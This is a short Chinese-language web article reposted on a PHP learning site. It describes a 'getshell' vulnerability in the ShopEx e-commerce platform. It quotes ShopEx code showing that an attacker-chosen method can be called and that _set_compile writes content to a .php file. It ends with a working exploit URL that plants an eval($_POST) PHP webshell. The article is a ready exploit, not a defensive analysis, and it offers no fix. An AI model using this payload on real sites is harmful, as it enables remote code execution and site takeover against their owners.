网站地图    收藏   

主页 > 后端 > 网站安全 >

shopex Getshell(鸡肋,需要站点开启伪静态) - 网站安

来源:自学PHP网    时间:2015-04-17 10:15 作者: 阅读:

[导读] ctl.product.phpclass ctl_product extends shopPage{ var $_call = #39;call#39;; var $type = #39;goods#39;; var $seoTag = array(#39;shopname#39;,#39;brand#39;......

ctl.product.php

	class ctl_product extends shopPage{

	    var $_call = 'call';
	    var $type = 'goods';
	    var $seoTag = array

('shopname','brand','goods_name','goods_cat','goods_intro','goods_brief','brand_kw','goods_kw','goods_pr

ice','update_time','goods_bn');
	    function ctl_product(){
	        parent::shopPage();
	        $this->title    = $this->system->getConf('site.goods_title');
	        $this->keywords = $this->system->getConf('site.goods_meta_key_words');
	        $this->desc     = $this->system->getConf('site.goods_meta_desc');
	    }
	    function call(){
	        $args = func_get_args();
	        $action = array_shift($args);
	//echo $args."||".var_dump($this);
	//echo 1111;
	var_dump($args);
	var_dump(get_class_methods($this));
	        if(method_exists($this,$action)){
	            return call_user_func_array(array(&$this,$action),$args);//可以执行一些 系统自带的函

数 我们找下有没可利用的
	        }

	pageFactory.php
	 public function _set_compile( $key, &$content )//就调用这个函数 可以直接写出shell
	    {
	        if ( !$this->force_compile )
	        {
	            file_put_contents( $this->compile_dir.$key.".php", $content );
	        }
	    }



http://xx.com/product-12-[/url]<script%20language="php">eval($_POST1)%3B-_set_compile.html

20130904170348

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论